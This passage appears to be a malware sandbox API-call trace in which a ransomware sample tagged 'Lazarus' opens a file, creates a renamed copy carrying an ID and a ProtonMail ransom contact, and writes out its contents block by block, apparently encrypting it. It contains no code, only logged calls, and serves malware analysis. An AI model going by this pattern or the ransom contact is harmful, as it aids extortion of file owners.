dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=47 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 47 [0073.356] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0073.356] GetFileType (hFile=0x420) returned 0x1 [0073.356] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0073.356] CloseHandle (hObject=0x420) returned 1 [0073.356] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0073.356] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0073.356] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0073.356] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0073.357] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0073.357] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0073.357] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0073.357] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0073.357] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0073.357] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0073.357] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0073.357] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0073.357] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0073.357] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0073.357] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0073.357] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0073.357] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0073.357] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0073.357] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0073.357] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0073.357] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0073.357] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0073.357] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0073.357] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0073.357] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0073.357] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0073.357] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0073.357] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0073.357] AreFileApisANSI () returned 1 [0073.357] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0073.357] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71ca0 [0073.357] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=47 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 47 [0073.357] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce2bc00, ftCreationTime.dwHighDateTime=0x1cac6d5, ftLastAccessTime.dwLowDateTime=0xce2bc00, ftLastAccessTime.dwHighDateTime=0x1cac6d5, ftLastWriteTime.dwLowDateTime=0xce2bc00, ftLastWriteTime.dwHighDateTime=0x1cac6d5, nFileSizeHigh=0x0, nFileSizeLow=0x31444)) returned 1 [0073.358] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0073.358] AreFileApisANSI () returned 1 [0073.358] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0073.358] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0073.358] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0073.358] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0073.358] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0073.358] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0073.358] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0073.358] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0073.358] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0073.358] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0073.358] GetLastError () returned 0x0 [0073.358] SetLastError (dwErrCode=0x0) [0073.358] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df18 [0073.358] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0073.358] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b8b0 [0073.358] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0073.358] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d7b0 [0073.358] GetLastError () returned 0x0 [0073.358] SetLastError (dwErrCode=0x0) [0073.358] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0073.358] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0073.358] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71620 [0073.358] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0073.358] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8abb8 [0073.358] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0073.358] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0073.358] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0073.359] AreFileApisANSI () returned 1 [0073.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8abb8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 109 [0073.359] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xda) returned 0x51398 [0073.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8abb8, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=109 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 109 [0073.359] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0073.368] GetFileType (hFile=0x420) returned 0x1 [0073.368] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0073.368] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0073.369] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0073.369] AreFileApisANSI () returned 1 [0073.369] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0073.369] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71ca0 [0073.369] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=47 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 47 [0073.369] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0073.369] GetFileType (hFile=0x418) returned 0x1 [0073.369] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0073.369] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69e30 [0073.369] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0073.369] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0073.369] GetLastError () returned 0x0 [0073.369] SetLastError (dwErrCode=0x0) [0073.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0073.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0073.370] GetLastError () returned 0x0 [0073.370] SetLastError (dwErrCode=0x0) [0073.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0073.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0073.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0073.370] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0073.372] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0073.372] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6c0 [0073.372] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8e440 [0073.372] GetLastError () returned 0x0 [0073.372] SetLastError (dwErrCode=0x0) [0073.373] GetLastError () returned 0x0 [0073.373] SetLastError (dwErrCode=0x0) [0073.374] GetLastError () returned 0x0 [0073.374] SetLastError (dwErrCode=0x0) [0073.374] GetLastError () returned 0x0 [0073.374] SetLastError (dwErrCode=0x0) [0073.374] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.374] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.376] GetLastError () returned 0x0 [0073.376] SetLastError (dwErrCode=0x0) [0073.376] GetLastError () returned 0x0 [0073.376] SetLastError (dwErrCode=0x0) [0073.376] GetLastError () returned 0x0 [0073.376] SetLastError (dwErrCode=0x0) [0073.376] GetLastError () returned 0x0 [0073.377] SetLastError (dwErrCode=0x0) [0073.377] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.377] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.377] GetLastError () returned 0x0 [0073.377] SetLastError (dwErrCode=0x0) [0073.377] GetLastError () returned 0x0 [0073.377] SetLastError (dwErrCode=0x0) [0073.378] GetLastError () returned 0x0 [0073.378] SetLastError (dwErrCode=0x0) [0073.378] GetLastError () returned 0x0 [0073.378] SetLastError (dwErrCode=0x0) [0073.378] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.378] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.378] GetLastError () returned 0x0 [0073.378] SetLastError (dwErrCode=0x0) [0073.378] GetLastError () returned 0x0 [0073.379] SetLastError (dwErrCode=0x0) [0073.379] GetLastError () returned 0x0 [0073.379] SetLastError (dwErrCode=0x0) [0073.379] GetLastError () returned 0x0 [0073.379] SetLastError (dwErrCode=0x0) [0073.379] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.379] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.379] GetLastError () returned 0x0 [0073.380] SetLastError (dwErrCode=0x0) [0073.380] GetLastError () returned 0x0 [0073.380] SetLastError (dwErrCode=0x0) [0073.380] GetLastError () returned 0x0 [0073.380] SetLastError (dwErrCode=0x0) [0073.380] GetLastError () returned 0x0 [0073.380] SetLastError (dwErrCode=0x0) [0073.380] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.380] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.381] GetLastError () returned 0x0 [0073.381] SetLastError (dwErrCode=0x0) [0073.381] GetLastError () returned 0x0 [0073.381] SetLastError (dwErrCode=0x0) [0073.381] GetLastError () returned 0x0 [0073.381] SetLastError (dwErrCode=0x0) [0073.381] GetLastError () returned 0x0 [0073.381] SetLastError (dwErrCode=0x0) [0073.381] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.382] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.382] GetLastError () returned 0x0 [0073.382] SetLastError (dwErrCode=0x0) [0073.382] GetLastError () returned 0x0 [0073.382] SetLastError (dwErrCode=0x0) [0073.382] GetLastError () returned 0x0 [0073.382] SetLastError (dwErrCode=0x0) [0073.382] GetLastError () returned 0x0 [0073.382] SetLastError (dwErrCode=0x0) [0073.383] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.383] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.383] GetLastError () returned 0x0 [0073.383] SetLastError (dwErrCode=0x0) [0073.383] GetLastError () returned 0x0 [0073.384] SetLastError (dwErrCode=0x0) [0073.384] GetLastError () returned 0x0 [0073.384] SetLastError (dwErrCode=0x0) [0073.384] GetLastError () returned 0x0 [0073.384] SetLastError (dwErrCode=0x0) [0073.384] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.384] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.384] GetLastError () returned 0x0 [0073.384] SetLastError (dwErrCode=0x0) [0073.385] GetLastError () returned 0x0 [0073.385] SetLastError (dwErrCode=0x0) [0073.385] GetLastError () returned 0x0 [0073.385] SetLastError (dwErrCode=0x0) [0073.385] GetLastError () returned 0x0 [0073.385] SetLastError (dwErrCode=0x0) [0073.385] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.385] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.386] GetLastError () returned 0x0 [0073.386] SetLastError (dwErrCode=0x0) [0073.386] GetLastError () returned 0x0 [0073.386] SetLastError (dwErrCode=0x0) [0073.386] GetLastError () returned 0x0 [0073.386] SetLastError (dwErrCode=0x0) [0073.386] GetLastError () returned 0x0 [0073.386] SetLastError (dwErrCode=0x0) [0073.386] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.387] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.387] GetLastError () returned 0x0 [0073.387] SetLastError (dwErrCode=0x0) [0073.387] GetLastError () returned 0x0 [0073.387] SetLastError (dwErrCode=0x0) [0073.387] GetLastError () returned 0x0 [0073.387] SetLastError (dwErrCode=0x0) [0073.387] GetLastError () returned 0x0 [0073.387] SetLastError (dwErrCode=0x0) [0073.387] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.388] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.388] GetLastError () returned 0x0 [0073.388] SetLastError (dwErrCode=0x0) [0073.388] GetLastError () returned 0x0 [0073.388] SetLastError (dwErrCode=0x0) [0073.388] GetLastError () returned 0x0 [0073.388] SetLastError (dwErrCode=0x0) [0073.388] GetLastError () returned 0x0 [0073.388] SetLastError (dwErrCode=0x0) [0073.389] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.389] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.389] GetLastError () returned 0x0 [0073.389] SetLastError (dwErrCode=0x0) [0073.389] GetLastError () returned 0x0 [0073.389] SetLastError (dwErrCode=0x0) [0073.389] GetLastError () returned 0x0 [0073.390] SetLastError (dwErrCode=0x0) [0073.390] GetLastError () returned 0x0 [0073.390] SetLastError (dwErrCode=0x0) [0073.390] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.390] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.390] GetLastError () returned 0x0 [0073.390] SetLastError (dwErrCode=0x0) [0073.390] GetLastError () returned 0x0 [0073.391] SetLastError (dwErrCode=0x0) [0073.391] GetLastError () returned 0x0 [0073.391] SetLastError (dwErrCode=0x0) [0073.391] GetLastError () returned 0x0 [0073.391] SetLastError (dwErrCode=0x0) [0073.391] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.392] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.392] GetLastError () returned 0x0 [0073.392] SetLastError (dwErrCode=0x0) [0073.392] GetLastError () returned 0x0 [0073.392] SetLastError (dwErrCode=0x0) [0073.393] GetLastError () returned 0x0 [0073.393] SetLastError (dwErrCode=0x0) [0073.393] GetLastError () returned 0x0 [0073.393] SetLastError (dwErrCode=0x0) [0073.393] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.393] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.393] GetLastError () returned 0x0 [0073.394] SetLastError (dwErrCode=0x0) [0073.394] GetLastError () returned 0x0 [0073.394] SetLastError (dwErrCode=0x0) [0073.394] GetLastError () returned 0x0 [0073.394] SetLastError (dwErrCode=0x0) [0073.394] GetLastError () returned 0x0 [0073.394] SetLastError (dwErrCode=0x0) [0073.394] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.394] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.395] GetLastError () returned 0x0 [0073.395] SetLastError (dwErrCode=0x0) [0073.395] GetLastError () returned 0x0 [0073.395] SetLastError (dwErrCode=0x0) [0073.395] GetLastError () returned 0x0 [0073.395] SetLastError (dwErrCode=0x0) [0073.395] GetLastError () returned 0x0 [0073.395] SetLastError (dwErrCode=0x0) [0073.395] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.395] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.396] GetLastError () returned 0x0 [0073.396] SetLastError (dwErrCode=0x0) [0073.396] GetLastError () returned 0x0 [0073.396] SetLastError (dwErrCode=0x0) [0073.396] GetLastError () returned 0x0 [0073.396] SetLastError (dwErrCode=0x0) [0073.396] GetLastError () returned 0x0 [0073.396] SetLastError (dwErrCode=0x0) [0073.397] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.397] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.397] GetLastError () returned 0x0 [0073.397] SetLastError (dwErrCode=0x0) [0073.397] GetLastError () returned 0x0 [0073.397] SetLastError (dwErrCode=0x0) [0073.397] GetLastError () returned 0x0 [0073.397] SetLastError (dwErrCode=0x0) [0073.397] GetLastError () returned 